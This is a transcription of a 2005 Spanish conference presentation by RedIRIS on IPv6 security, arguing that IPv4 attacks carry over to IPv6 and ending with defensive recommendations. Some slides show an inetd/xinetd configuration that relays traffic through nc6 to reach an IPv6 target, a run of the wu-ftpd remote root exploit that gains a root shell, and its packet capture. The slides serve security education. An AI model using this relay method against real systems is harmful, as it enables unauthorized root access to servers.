Estamos preparados para IPv6?: Análisis de seguridad
|
|
- Ángela Carrizo Macías
- hace 2 años
- Vistas:
Transcripción
1 Estamos preparados para IPv6?: Análisis de seguridad Francisco Jesús Monserrat Coll RedIRIS / Red.es Congreso de Seguridad en Computo México: Viernes 27 de Mayo 2005
2 Indice Por Qué nos preocupamos por IPv6? Breve Introducción a IPv6 IPv6, es más seguro? Reciclaje de problemas Soluciones y vías futuras
3 RedIRIS Surge en 1988 para proporcionar conectividad a Universidades y Centros de I+D Españoles Puesta en marcha de los primeros servicios de Internet en España, DNS, News, etc.. Conexión basada en un un punto de acceso regional al que se conectan los centros. 250 centros conectados Desde Enero de 2004 depende del ente publico empresarial Red.es Mismo backbone tanto para Internet comercial como Internet2.
4 Internet2 en el backbone Empleo del backbone para aplicaciones avanzadas: Opera Oberta: Retransmisión de sesiones de Opera en alta calidad (10 Mbs) Empleo de Multicast para la distribución de los contenidos. Pruebas en Mayo 2005 de retransmisión vía multicast sobre IPv6. Posible aumento del tráfico IPv6?
5 Uso de IPv6 Uso de IPv6 en algunas Universidades Españolas:
6 Seguridad en IPv6 De que no vamos a hablar: IPSEC y demás aspectos relacionados con las criptografía Marcado de tráfico IP, cabeceras, etc. Por qué IPv6 es más seguro que Ipv4? Etc, etc, etc.... Se puede: Buscar en google CISCO: Presentación Michael H. Warfield (ISS) FIRT Conference 2004,
7 Seguridad en IPv6 De que no vamos a hablar: IPSEC y demás aspectos relacionados con la criptografía Marcado de tráfico IP, cabeceras, etc. Por qué IPv6 es más seguro que Ipv4? Etc, etc, etc. Estamos hablando: Qué tipos de ataques// intrusión en sistemas podemos tener en máquinas conectadas a IPv6?
8 Seguridad en IPv6 De que no vamos a hablar: IPSEC y demás aspectos relacionados con la criptografía Marcado de tráfico IP, cabeceras, etc. Por qué IPv6 es más seguro que Ipv4? Etc, etc, etc. Estamos hablando: Qué tipos de ataques// intrusión en sistemas podemos tener en máquinas conectadas a IPv6?: Los mismos que en IPV4
9 Por qué IPv6? Falta de direcciones en el protocolo Ipv4 actual. Direcciones de 32 bits Falta de direcciones en zonas geográficas conectadas tarde a internet Asia América Latina Empleo de IP para la interconexión de dispositivos. Domótica incremento del número de dispositivos que hablan en la red. Simplificación del protocolo
10 Estructura de IPv6 Aumento de las direcciones disponibles: 4 bytes 2^32 direcciones en IPV4 16 bytes 2^128 direcciones en IPv6 Asignación de /64 (2^64 direcciones) a cada usuario doméstico por proveedores. Simplificación de cabeceras No existe fragmentación Empleo de cabeceras opcionales para especificar encriptación, routing etc. Mecanismos de autoconfiguración en los equipos.
11 IPv6 más seguro? : Encriptación IPSEC es parte integrante de IPv6: facilidad para cifrar las comunicaciones punto a punto entre dispositivos. Ya no pueden leer las claves por la red!! Pero: Qué rendimiento darán los dispositivos móviles a nivel de cifrado de las conexiones? Se sigue necesitando una estructura de certificación, muchas veces compleja de configurar para poder negociar las conexiones IPSEC. Como podemos ver si un tráfico cifrado es legitimo? Emplearan los atacantes IPv6 con IPSEC para cifrar las conexiones?
12 IPv6 más seguro?: fin de los escaneos Con IPv6 se acabaron los gusanos: Fin de los gusanos, Quien va a encontrar una dirección a la que infectar en toda la internet? Pero: Existen métodos de enumeración de equipos aparte del escaneo: Empleo de buscadores (google) para buscar nombres de equipos Trazas de correos, netnews, etc. Modificación de aplicaciones P2P para buscar direcciones de equipos. Barridos a nivel DNS. Como se va a aplicar el direccionamiento interno? Como se va a aplicar el direccionamiento interno? Hacen falta mecanismos de administración en una red para administrar los equipos.
13 IPv6 más seguro?: Tuneles IPv4 permite la creación de túneles de una forma fácil. Junto con IPSEC permite la movilidad de los usuarios Pero: Misma dirección con independencia de la localización Permite la conexión remota a nuestras oficinas Permiten saltarse las políticas de seguridad de la Universidad Qué pasa con las VPN y los gusanos? Usuarios expuestos a ataques desde el exterior? Pueden ser utilizados por atacantes Uso de túneles IPv6 para ocultar conexiones en botnets y máquinas comprometidas Algunos sistemas operativos incluyen túneles IPv6 por defecto
14 IPv6 más seguro?: Elementos de seguridad Gran parte de los fabricantes anuncian soporte para IPv6: routers y firewall: Soportan filtrado, bloqueo de tráfico igual que en IPv6? Muchas veces el filtrado es por software, lo que provoca un mayor uso de CPU Dependen mucho de la ultima versión ( actualización?) del equipo. Como van a controlar los túneles? Detección de intrusos: Procesamiento de las cabeceras, tamaño variable, para detectar ataques a nivel de aplicación Sistemas Operativos: Pilas TCP/IP optimizadas ante ataques?
15 IPv6 más seguro?: Aplicaciones Los problemas de seguridad en la actualidad no se producen en la red. Buffer overflows, Ataques de fuerza bruta a claves débiles Fallos de programación en aplicaciones WWW IPv4 no da respuesta a estos problemas: Gran parte de los ataques sobre IPV4 se pueden realizar en IPv6.. Se pueden reciclar los ataques?
16 Indice El reciclaje informático, un ejemplo práctico Configuración de una red IPv6 Demostración de un ataque Soluciones y vías futuras
17 Reciclaje del Hardware (I) u Vax 3100 server: No es ni una Sun, ni un PC es un VAX ;-) 24 megas RAM Disco duro 100Megas 16Mhercios Sin monitor ;-( OpenVMS En resumen: Un cacharro para tirar ;-(
18 Reciclaje del Hardware (II) Aunque se puede actualizar:, se abre, se coloca un CD y: NetBSD ;-) Unix de los de antes Ni bash, ni interface gráfico Ocupa poco Ligero (no tiene ni rpm ;.-) Soporte de IPv6 de serie sin problemas. Ejemplo de como reciclar los problemas de seguridad antiguos en IPv6.
19 Confguración Genérica de una red en IPv6 Como ve nuestra red un atacante? Internet Conexión Servidores Equipos de red
20 Configuración genérica de IPv6 (II) Protección de nuestra red Internet Conexión Servidores Red Interna Equipos de usuario
21 Configuración generica de Ipv6 (III) La red en IPv6 Internet Conexión Servidores Red Interna Equipos de usuario
22 Configuración generica de IPv6 (IV) Internet Conexión Servidores Red Interna Equipos de usuario
23 Configuración generica de IPv6 (IV) Internet 2 Internet Conexión Servidores Red Interna Equipos de usuario
24 IPv4 : Ya esta aquí!! Gran parte de los equipos soportan IPv6 Bastantes Sistemas Operativos soportan IPv6 Están actualizados los servidores corporativos? Actualizaciones tardías debidas a ventanas de mantenimiento. Falsa seguridad: Están protegidos por el firewall Quien va a emplear IPv6 para atacar? Mecanismos de túneles y autoconfiguración pueden dificultar la administración de los equipos en la red.
25 Fallos de configuración en IPv6 Muchas veces los filtros aplicados en IPv4 no se aplican en IPv6 Filtrado por software en algunos modelos de routers IPv4 es un servicio experimental muchas veces gestionado por departamentos de investigación. Falta de contactos ante problemas de seguridad Desconocimiento de los problemas de seguridad que pueden existir El filtrado IPv6 esta soportado en Linux, pero no en muchos productos comerciales que emplean este sistema operativo como base de su cortafuegos. En resumen: Muchas redes IPv6 están abiertas por completo, sin ningún filtro desde el exterior.
26 Repaso de la pila OSI IPv6 solo afecta a: Nivel de Red Icmp El tráfico a nivel de aplicación y sesiones (http, por ejemplo) no cambia. Sería posible reciclar las herramientas existentes para que funcionen en IPv6? Nivel Aplicación Aplicación (sesión) Transporte Nivel de Red Nivel Físico
27 Exploit de IPv6 en IPv4 Exploit: programa que emplea una vulnerabilidad del Sistema Operativo (demuestra que existe el problema ;-), y suele permitir la ejecución de código en el equipo atacado. Qué hace falta para probar un exploit de IPv6 en IPv4? 1) Código fuente del exploit 2) Convertir el código IPv4 a IPv6 Problema: El código fuente no suele ser muy legible o no se dispone de éste Convertir el tráfico IPv4 en IPv6 Mediante traducción de direcciones (router) Empleando pasarelas a nivel de transporte (TCP)
28 Conversión IPv4 a IPv6 Qué hace falta? El exploit Disponible en IPv4 Escuchar en un puerto IPv4 Inetd, Xinetd Enviar los datos vía IPv6 Netcat IPv6,
29 Fallo de seguridad en Wu-ftpd Exploit contra servidores FTP Linux Ejemplo de ataque a nivel de aplicación /protocolo Bastante extendido hace unos años Funciona en distintas distribuciones Linux Soporte IPv4 en estas distribuciones Linux. Acceso como root al sistema Quien dice que no hay máquinas desprotegidas tras los cortafuegos? Sistemas Operativos Antiguos Equipos sin actualizar
30 Configuración de la pasarela inetd.conf: ftp stream tcp nowait root /usr/local//bin/nc /usr/local/bin/nc6 victima.ip ftp xinetd service ftp { socket_type = stream wait = no user = root server = /usr/bin/nc6 server_args = victim IPv6_addr ftp log_on_success+= DURATION USERID log_on_failure += USERID nice = 10 }
31 Ejemplo de ataque en IPv6./wu -a -v vax.pruebas.org 7350wurm - x86/linux wuftpd <= remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy... ### TARGET: RedHat 7.2 (Enigma) [wu-ftpd i386.rpm] # exploitation succeeded. sending real shellcode # sending setreuid/chroot/execve shellcode # spawning shell ################## uid=0(root) gid=0(root) groups=50(ftp) Linux grima #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown ls -al / total 164 drwxr-xr-x 19 root root 4096 Jul 5 20:15. drwxr-xr-x 19 root root 4096 Jul 5 20:15.. -rw-r--r-- 1 root root 0 Jul 5 09:54.autofsck
32 Ejemplo de ataque en IPv6 (II) Tráfico del ataque 21:15: :720:6969:666:: > 2001:720:40:2cff::247.ftp: P 1449:1477(28) ack 4320 win x b f00 `...0.;... 0x x aafe...g...)i.. 0x0030 3ed f e 7365 >.0bP..3...unse 0x c45 3b69 643b 756e t.histfile;id;un 0x d d61 3b0a ame.-a;. 21:15: :720:40:2cff::247.ftp > 2001:720:6969:666:: : P 4359:4424(65) ack 1477 win x cff 0x f00...G... 0x ed >.0. 0x ab1a c69 6e75 )i..p..."..linu 0x d e 342e 372d 3130 x.grima x #1.Thu.Sep x0060 3a34 363a :46:36.EDT x e6b 6e6f 776e 0a i686.unknown. 21:15: :720:6969:666:: > 2001:720:40:2cff::247.ftp: P 1477:1486(9) ack 4424 win x d 063b f00 `...;... 0x x ab1a...g...)i..
33 Evolucion Afortunadamente Windows XP No se configura por defecto para emplear NetBIOS sobre IPv6 (todavía) Pocos ataques tras SP2? Pero: Configuración automática de túneles Teredo en Microsoft Vamos a permitir que que se salten nuestras políticas de seguridad? Acceso vía IPv4 a aplicaciones y servicios filtrados a nivel Ipv4 Qué pasará cuando los gusanos, etc. empleen IPv6?
34 Evolución (II) Pŕacticamente cualquier ataque sobre IPV4 se puede realizar en IPv4 Intentos de ataques por fuerza bruta vía SSH: Ataques a aplicativos HTTP Web defacements? Inserción de código
35 Conclusiones Qué hacer?: (Lo mismo que en IPv4): Política institucional que contemple el uso de la red y quien es el responsable. No conectar a IPv6 equipos que no estén asegurados (parches ;-) Control de los túneles hacia el exterior Monitorizar y controlar las redes IPv6 del mismo modo que IPv4 Flujos Cortafuegos IDS (no solo monitorizar trafico IPv6 ) No tirar los equipos antiguos (salvar el VAX ;-)
36 Referencias: I Foro de IPv6 de RedIRIS, Security Implications of IPv6, Cisco: Implementing IPv6 security : IPv6 threats:
SIE - Firewall DMZ. Protección perimetral para su red local. 1. Importancia de los firewalls. 2. Arquitectura de la red
Protección perimetral para su red local por ALBA Software SIE Firewall es un sistema pensado para proteger la red de su empresa de posibles ataques de Internet. El firewall actua de barrera separando la
Práctica de Seguridad en Redes
Práctica de Seguridad en Redes Juan Boubeta Puig y Antonio García Domínguez Seguridad y Competencias Profesionales Departamento de Ingenieria Informatica Universidad de Cadiz Curso 2012-2013 1. Descripción
EXPERTO EN ADMINISTRACIÓN Y SEGURIDAD DE REDES INFORMÁTICAS
Instituto de Formación Profesional CBTech Estudie desde su hogar y obtenga un certificado universitario Formación a distancia de EXPERTO EN ADMINISTRACIÓN Y SEGURIDAD DE REDES INFORMÁTICAS 1 Temario del
SEGURIDAD EN REDES. NOMBRE: Daniel Leonardo Proaño Rosero. TEMA: SSH server
SEGURIDAD EN REDES NOMBRE: Daniel Leonardo Proaño Rosero TEMA: SSH server SSH (Secure SHell, en español: intérprete de órdenes segura) es el nombre de un protocolo y del programa que lo implementa, y sirve
MultiBase y Cosmos. Particularidades sobre la instalación del motor de base de datos en modo cliente servidor. BASE 100, S.A. www.base100.
Particularidades sobre la instalación del motor de base de datos en modo cliente servidor BASE 100, S.A. www.base100.com Índice 1. INSTALACIÓN EN CLIENTE SERVIDOR... 3 1.1 EN LA MÁQUINA SERVIDOR... 3 1.1.1
MÁSTER ONLINE EN ADMINISTRACIÓN LINUX
MÁSTER ONLINE EN ADMINISTRACIÓN LINUX Módulo 1 Hardware & Arquitectura de sistemas - 20 horas Este módulo permite conocer y configurar los elementos básicos del hardware del sistema, como también otros
GUÍAS FÁCILES DE LAS TIC
GUÍAS FÁCILES DE LAS TIC del COLEGIO OFICIAL DE INGENIEROS DE TELECOMUNICACIÓN Trabajo Premiado 2006 Autor: Router IP D. José María Jurado García-Posada 17 de Mayo 2006 DIA DE INTERNET Guía fácil Router
Seguridad Informática con Software Libre
1 Seguridad Informática con Software Libre Lic. Julio C. Ardita jardita@cybsec cybsec.comcom 1er Encuentro de Software Libre en el Estado 13 de Mayo de 2005 Santa Cruz - ARGENTINA 2 Temario La seguridad
INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas
INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas W8: wexplor VIROLOGÌA Y CRIPTOLOGÌA 4NM73 W8:INTERNET EXPLORER U5: FILE TRANSFER
3-ANÁLISIS DE VULNERABILIDADES
3-ANÁLISIS DE VULNERABILIDADES Es la tercera fase del ciclo de auditoria del tipo Hacking Ético, y tiene como objetivo el identificar si un sistema es débil o susceptible de ser afectado o atacado de alguna
Existe una solicitud disponible a tal efecto en la url: http://cms.ual.es/ual/universidad/serviciosgenerales/stic/servicios/servicio/servicio1 4774
1. Conceptos Generales. Un cortafuegos o firewall lo que hace es filtrar el tráfico de red entrante (desde un PC de fuera al nuestro) o saliente (desde nuestro PC hacia fuera). Este tráfico se puede filtrar
PREGUNTAS FRECUENTES SOBRE IPv6
PREGUNTAS FRECUENTES SOBRE IPv6 Qué es una dirección IP? Las siglas IP corresponden a Internet Protocol, en español, Protocolo de Internet. Este protocolo lo componen una serie de mecanismos que emplean
Administración de un ambiente de trabajo con Microsoft Windows Server 2003 Soporte de un ambiente de trabajo con Microsoft Windows Server 2003
Temario W@D MCP Cursos Requeridos Administración de un ambiente de trabajo con Microsoft Windows Server 2003 W@D MCSA + Seguridad Cursos Administración de un ambiente de trabajo con Microsoft Windows Server
Administración de un ambiente de trabajo con Microsoft Windows Server 2003 Soporte de un ambiente de trabajo con Microsoft Windows Server 2003
Temario W@D MCP Cursos Requeridos Administración de un ambiente de trabajo con Microsoft Windows Server 2003 W@D MCSA + Seguridad Cursos Administración de un ambiente de trabajo con Microsoft Windows Server
Recuperación de Información en Internet: Tema 1: Internet
Recuperación de Información en Internet: Tema 1: Internet P.O.P. Língua e usos profesionais Miguel A. Alonso Jorge Graña Jesús Vilares Departamento de Computación Facultad de Informática Universidade da
CAPITULO 14 SEGURIDAD EN LA RED
CAPITULO 14 SEGURIDAD EN LA RED Seguridad en la red La palabra seguridad de acuerdo con el Diccionario American Heritage es sinónimo de garantía y garantizar. Según el diccionario de la Real Academia seguridad
Redes Privadas Virtuales
Redes Privadas Virtuales Dr. Luis Gerardo de la Fraga Departamento de Computación Cinvestav Correo-e: fraga@cs.cinvestav.mx 1 de junio de 2011 Dr. Luis Gerardo de la Fraga Cinvestav. VPNs Redes Privadas
GLOSARIO DE TÉRMINOS CUALIFICACIÓN PROFESIONAL: OPERACIÓN DE REDES DEPARTAMENTALES. Código: IFC299_2 NIVEL: 2
MINISTERIO DE EDUCACIÓN, CULTURA Y DEPORTE SECRETARÍA DE ESTADO DE EDUCACIÓN, FORMACIÓN PROFESIONAL Y UNIVERSIDADES DIRECCIÓN GENERAL DE FORMACIÓN PROFESIONAL INSTITUTO NACIONAL DE LAS CUALIFICACIONES
Seguridad Informática
Seguridad Informática Técnicas de Hacking y Seguridad Luis Yagüe EFOR Temario Comparación de Sistemas Operativos desde el punto de vista de la Seguridad Informática Firewalls, Proxys, DMZs. Virus Informáticos
REQUISITOS MÍNIMOS DE INSTALACIÓN A3ERP
REQUISITOS MÍNIMOS DE INSTALACIÓN A3ERP INTRODUCCIÓN Fecha revisión: Abril/2012 Estos requisitos son los mínimos que recomendamos para el correcto funcionamiento del programa. Es importante, que si el
Enlace web remoto a travez de SSh Juan Badilla Riquelme Anibal Espinoza Moraga Cesar Reyes Pino
Redes de Computadores I Enlace web remoto a travez de SSh Juan Badilla Riquelme Anibal Espinoza Moraga Cesar Reyes Pino Introducción Redes de Computadores I Es trabajo tiene el fin de entregar la información
Hacking en 5 pasos usando Software libre
Hacking en 5 pasos usando Ponente: JUAN DAVID BERRIO LOPEZ judabe2003@gmail.com Ingeniero en Informática. Especialista en redes Universidad san Buenaventura Posgrado en Seguridad Redes UOC, CCNSP Cyberoam/India
UD 4: Instalación y configuración de cortafuegos
UD 4: Instalación y configuración de cortafuegos Cortafuegos software y hardware Luis Alfonso Sánchez Brazales 1 Cortafuegos software integrados en los sistemas operativos Un firewall gratuito es un Software
CAPÍTULO 1. LAS REDES...
ÍNDICE CAPÍTULO 1. LAS REDES... 13 1.1 QUÉ ES UNA RED?... 13 1.2 LOS COMPONENTES DE UNA RED... 14 1.3 LOS TIPOS DE REDES... 14 1.3.1 Por su tamaño... 15 1.3.2 Por la forma de conexión... 15 1.4 VENTAJAS
VPN RED PRIVADA VIRTUAL INTEGRANTES: ALEXANDER BERNAL RAMIREZ CARLOS TRANCA JOSUE FLORES MIGUEL ANGEL VILLANUEVA
VPN RED PRIVADA VIRTUAL INTEGRANTES: ALEXANDER BERNAL RAMIREZ CARLOS TRANCA JOSUE FLORES MIGUEL ANGEL VILLANUEVA CONCEPTO VPN DEFINICIÓN, QUE SE PUEDE HACER CON UN VPN TIPOS DE VPN - ARQUITECTURA VPN ACCESO
Donde puedo instalar GFI EventsManager en mi red?
Instalación Introducción Donde puedo instalar GFI EventsManager en mi red? GFI EventsManager se puede instalar en cualquier equipo que reúna los requisitos mínimos del sistema independientemente de la
Concepto de Seguridad de Alto Nivel: A lo largo del curso hemos establecido protecciones en los equipos y en la información que almacenan e
Concepto de Seguridad de Alto Nivel: A lo largo del curso hemos establecido protecciones en los equipos y en la información que almacenan e intercambian. En este último capítulo vamos a abordar los sistemas
Firewall (Hardware): Es una aparato que se utiliza en la redes (por lo general WAN o MAN) para la protección de las mismas. Este tiene como principal
Firewall (Hardware): Es una aparato que se utiliza en la redes (por lo general WAN o MAN) para la protección de las mismas. Este tiene como principal función la protección de toda la Red, ya sea LAN, WAN
OBJETIVOS DE APRENDIZAJE
PLAN DE ESTUDIOS: SEGUNDO CICLO ESPECIALIDAD COMPUTACIÓN 4 to AÑO CAMPO DE FORMACIÓN: ESPECIALIZACIÓN ÁREA DE ESPECIALIZACIÓN: EQUIPOS, INSTALACIONES Y SISTEMAS UNIDAD CURRICULAR: ADMINISTRACIÓN DE SISTEMAS
Seguridad Wi-Fi. Seguridad Wi-Fi
Cuando Ud. se comunica a través de Internet usando una conexión cableada o inalámbrica, querrá asegurar que sus comunicaciones y ficheros tienen privacidad y están protegidos. Si sus transmisiones no son
Tecnologías De La Información Y Comunicación I. Firewall Y Proxy. Integrantes: Héctor Duran. Katherine Zumelzu
Firewall Y Proxy Integrantes: Héctor Duran Katherine Zumelzu Fecha: 15/04/2015 Índice Qué es un firewall?... 3 Tipos de Firewall... 4 -Nivel de aplicación de Pasarela:... 4 -Circuito a nivel de Pasarela:...
ADMINISTRADOR DE XARXES LOCALS
ADMINISTRADOR DE XARXES LOCALS Administración de un entorno Microsoft Windows Server 2003 Módulo 1: Introducción a la administración de cuentas y recursos El entorno Windows Server 2003 Iniciar la sesión
GLOSARIO DE TÉRMINOS
MINISTERIO DE EDUCACIÓN, CULTURA Y DEPORTE SECRETARÍA DE ESTADO DE EDUCACIÓN, FORMACIÓN PROFESIONAL Y UNIVERSIDADES DIRECCIÓN GENERAL DE FORMACIÓN PROFESIONAL INSTITUTO NACIONAL DE LAS CUALIFICACIONES
LINEAMIENTOS DE ESQUEMAS DE SEGURIDAD DE LA INFORMACIÓN
LINEAMIENTOS DE ESQUEMAS DE SEGURIDAD DE LA INFORMACIÓN 1 OBJETIVO Describir los lineamientos aplicados a la gestión y administración de los equipos de seguridad instalados en la salida a internet y en
LIME Access: Solución para entornos de conectividad remota de alta seguridad
LIME Access: Solución para entornos de conectividad remota de alta seguridad Índice Introducción: Riesgos en los entornos de Movilidad basados en PC y Laptop LIME Access: Soluciones de acceso remoto seguro
CONSOLA DE SEGURIDAD INFORMACIÓN DE LICENCIA. Manual de usuario. Versión 2.00 Abril 2010
Manual de usuario CONSOLA DE SEGURIDAD Versión 2.00 Abril 2010 INFORMACIÓN DE LICENCIA ACUERDO DE LICENCIA AVISO A TODOS LOS USUARIOS: LEA ATENTAMENTE EL ACUERDO JURÍDICO APROPIADO CORRESPONDIENTE A LA
CAPÍTULO VI. RESULTADOS, PRUEBAS Y CONCLUSIONES DE LA APLICACIÓN.
CAPÍTULO VI. RESULTADOS, PRUEBAS Y CONCLUSIONES DE LA APLICACIÓN. Finalmente en este último capítulo se conocen los resultados, las pruebas y las conclusiones finales de la aplicación Web para el monitoreo
INTRODUCCIÓN...15 TEORÍA...17
ÍNDICE INTRODUCCIÓN...15 TEORÍA...17 CAPÍTULO 1. ASPECTOS BÁSICOS...19 1.1 TAREAS DEL ADMINISTRADOR...19 1.2 HARDWARE DEL SERVIDOR...21 1.2.1 CPD...21 1.2.2 Sistema de rack...23 1.2.3 Servidores...24 1.2.4
We Care For Your Business Security
We Care For Your Business Security Warriors Defender Firewall es una sólida solución de cortafuego y control, fácil de utilizar y económica para empresas de cualquier tamaño. Warriors Defender Firewall
Software de Comunicaciones. Práctica 7 - Secure Shell. SSH
Software de Comunicaciones Práctica 7 - Secure Shell. SSH Juan Díez-Yanguas Barber Software de Comunicaciones Ingeniería Informática - 5º Curso Jdyb - Mayo 2013 Juan Díez- Yanguas Barber Práctica 7 Índice
CONCLUSIONES 155 A través de cada uno de los capítulos del presente documento se han enumerado una serie herramientas de seguridad que forman parte del sistema de defensa de una red y que, controlan su
Servidor Firewall. Patrick Hernández Cuamatzi. Maestría en Ingeniería de Software Redes Avanzadas
Servidor Firewall Patrick Hernández Cuamatzi Qué es un firewall? Un firewall es un sistema diseñado para impedir el acceso no autorizado o el acceso desde una red privada. Pueden implementarse firewalls
Cortafuegos software y hardware. Gabriel Montañés León
Cortafuegos software y hardware Gabriel Montañés León * Firewall (Hardware): Es una aparato que se utiliza en la redes (por lo general WAN o MAN) para la protección de las mismas. Este tiene como principal
Seguridad Perimetral. Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012
Seguridad Perimetral Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012 Introducción La mayoría de las empresas sufren la problemática de seguridad debido a sus necesidades
Funciones Avanzadas de los Firewalls. Ing. Camilo Zapata czapata@udea.edu.co Universidad de Antioquia
Funciones Avanzadas de los Firewalls. Ing. Camilo Zapata czapata@udea.edu.co Universidad de Antioquia Con el tiempo a los firewalls se les ha agregado mas características: Autenticación de Usuarios VPN
TEMA 1 Modelo OSI de Seguridad
TEMA 1 Modelo OSI de Seguridad José María Sierra Departamento de Informática Universidad Carlos III de Madrid José M. Sierra 1 Introducción Necesidad de seguridad de una organización Evaluar su nivel de
Módulos: Módulo 1. Hardware & Arquitectura de sistemas - 20 Horas
Módulos: Módulo 1 Hardware & Arquitectura de sistemas - 20 Horas Este módulo permite conocer y configurar los elementos básicos del hardware del sistema, como también otros componentes adicionales como
Cómo funciona Solución mwatcher Let's connect
Cómo funciona Solución mwatcher Let's connect Introducción En este documento vamos a explicar cuáles son las problemáticas que nos encontramos a la hora de realizar un telemantenimiento o acceso remoto
El Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec
Metodología. www.dsteamseguridad.com La Metodología de la charla esta guiada por el concepto de cada una de las fases de ataque, con su respectiva demostración Arquitectura de Red (Laboratorio Virtual)
TEMA 3. REDES Y SEGURIDAD INFORMÁTICA
TEMA 3. REDES Y SEGURIDAD INFORMÁTICA REDES INFORMÁTICAS. 1. Qué ventajas tiene usar ordenadores en red, frente al trabajo aislado? 2. Explica la diferencia entre el área de alcance de una red LAN y una
Necesidad de procesar y almacenar Información.
Necesidad de procesar y almacenar Información. Necesidad de compartir Información (LAN, WAN, Internet). Las Redes Privadas Virtuales, surgen debido a deficiencias en seguridad, falta de confidencialidad
PONTIFICIA UNIVERSIDAD JAVERIANA Módulo Seguridad Firewall, Proxy
PONTIFICIA UNIVERSIDAD JAVERIANA Módulo Seguridad Firewall, Proxy Diplomado Desarrollo de Aplicaciones para Internet Ingeniero Germán A. Chavarro F., M.Sc Pontificia Universidad Javeriana Julio 2004 Qué
ALOJAMIENTO DE SERVIDORES EN EL C.P.D.
ALOJAMIENTO DE SERVIDORES EN EL C.P.D. Descripción del servicio. Los Servicios Informáticos ofrecen el servicio de housing o alojamiento de servidores en las instalaciones existentes de la planta sótano
Índice general. Índice general
Índice general Índice general 5 Capítulo 1: Presentación de Windows Server 2008... 19 LAS NOVEDADES EN WINDOWS SERVER 2008... 21 LAS EDICIONES DE WINDOWS SERVER 2008... 25 Edición Standard... 26 Edición
Hacer uso de las herramientas de software para contribuir a mejorar los niveles de seguridad informática en una organización.
Nombre de la asignatura: Seguridad Informática Créditos: 2-3 - 5 Aportación al perfil Aplicar conocimientos científicos y tecnológicos en la solución de problemas en el área informática con un enfoque
TELETRABAJO SEGURO. Manuel Arrevola Director General Comercial. Zitralia Seguridad Informatica S.L.
TELETRABAJO SEGURO Manuel Arrevola Director General Comercial Zitralia Seguridad Informatica S.L. Agenda Tendencia actual al TELETRABAJO Descripción de la compañía ZITRALIA Introducción: Riesgos en los
seguridad en redes inalámbricas
Ç soluciones de seguridad en redes inalámbricas ` María Victoria Figueroa Domínguez Subdirectora General Adjunta del Ministerio de la Presidencia Daniel Merino Mateo Tecnocom En este artículo se pretende
Vulnerabilidades de los sistemas informáticos
Vulnerabilidades de los sistemas informáticos formador Ezequiel Llarena Borges http://youtu.be/fdhayogalv4/ 1 Responsables de las vulnerabilidades que afectan a los sistemas informáticos formador Ezequiel
Instalar protocolo, cliente o servicio nuevo. Seleccionar ubicación de red. Práctica - Compartir y conectar una carpeta
Configuración de una red con Windows Aunque existen múltiples sistemas operativos, el más utilizado en todo el mundo sigue siendo Windows de Microsoft. Por este motivo, vamos a aprender los pasos para
ÍNDICE DE CONTENIDOS
ÍNDICE DE CONTENIDOS 1. Conceptos generales sobre redes... 1. 2. Elementos básicos de una red. Hardware y Software... 3. 3. Configuración de una LAN. Protocolo TCP IP... 5. 4. Recursos compartidos en una
SERVIDOR PROXY CACHÉ. Servicios que ofrece:
SERVIDOR PROXY CACHÉ Servicios que ofrece: 1. Filtrado de contenidos web. 2. Proxy caché. 3. Cortafuegos. 4. Antivirus 5. Servidor DHCP. 6. Balanceo de carga. 7. Servidor Web para Intranets. 8. Administración
Capítulo 4.- Recomendaciones para un Servidor web y de bases de datos seguro.
Capítulo 4.- Recomendaciones para un Servidor web y de bases de datos seguro. Este capítulo explica las características que un servidor web y de bases de datos seguro debe tener. Esto es esencial para
: COMPUTACIÓN E INFORMATICA : Ingeniería de Software Ingeniería de Redes y Comunicaciones : Diseño Básico de Redes : T-RED106
I. DATOS INFORMATIVOS Carrera Especialidad Curso Código Ciclo : Tercero Requisitos Duración Horas Semana : 08 horas Versión : v.0109 II. SUMILLA: : COMPUTACIÓN E INFORMATICA : Ingeniería de Software Ingeniería
m DRO MACCD6.m REG. 0417
INFORME TÉCNICO PREVIO DE EVALUACIÓN DE SOFTWARE No 017-GT1000 Adquisición de una Solución Antivirus lnstitucional o renovación anual de licencias del software antivirus que actualmente dispone esta Institución.
Instalación, Administración y Configuración de Windows 8
Cursos Especialización Versión 1.0 12/02/2013 Tabla de contenido 1 Descripción... 3 2 Duración, fechas y precio... 3 3 Perfil... 3 4 Requisitos... 3 5 Objetivos... 4 6 Certificación... 4 7 Contenido...
Felipe Jara Saba Ing. Civil Telemático felipejara@gmail.com
Felipe Jara Saba Ing. Civil Telemático felipejara@gmail.com Agenda Problemas actuales en IPv4 Descripción IPv6 Mitos de IPv6 IPv6 @ Mundo Soporte en aplicaciones Conclusiones IPv4 Internet Protocol version
Universidad Técnica Federico Santa María Departamento de Electrónica. Proyecto Redes de Computadores Elo322 Routers, Servidor Virtual y Seguridad
Universidad Técnica Federico Santa María Departamento de Electrónica Proyecto Redes de Computadores Elo322 Routers, Servidor Virtual y Seguridad Integrantes: Edson Contreras C. Luis Marcel Barraza M. Fecha:
Evaluación de los aprendizajes Elabora un cuadro comparativo con las principales características de los componentes básicos de una red de datos.
NÚCLEO: Sector Comercio y Servicios SUBSECTOR: Informática y comunicación Nombre del Módulo: REDES total: 90 horas Objetivo General: Desarrollar conocimientos teóricos/prácticos para el diseño, configuración
Cómo afrontar la Seguridad en Redes Abiertas: Consideraciones Técnicas y Escenarios.
Cómo afrontar la Seguridad en Redes Abiertas: Consideraciones Técnicas y Escenarios. Encarnación Sánchez Vicente 1. INTRODUCCIÓN No cabe ninguna duda que en nuestros días, la información es la clave. Esta
III. PROPUESTA DE SOLUCION
III. PROPUESTA DE SOLUCION Propuesta de Solución 1. Concepto General. A fin de brindar una alternativa de solución a la problemática planteada, se propone la implementación de los servicios de Voz sobre
Protección de su Red
Protección de su Red Ing. Teofilo Homsany Gerente General SOLUTECSA PaiBlla Mall, Local 45. Telefono: +507.209.4997 E mail: ventas@solucionesdetecnologia.com Áreas vulnerables de su red Gateway (entrada
BotNet. Grupo de cordinación de Seguridad, IRIS-CERT 26 de Octubre de 2004
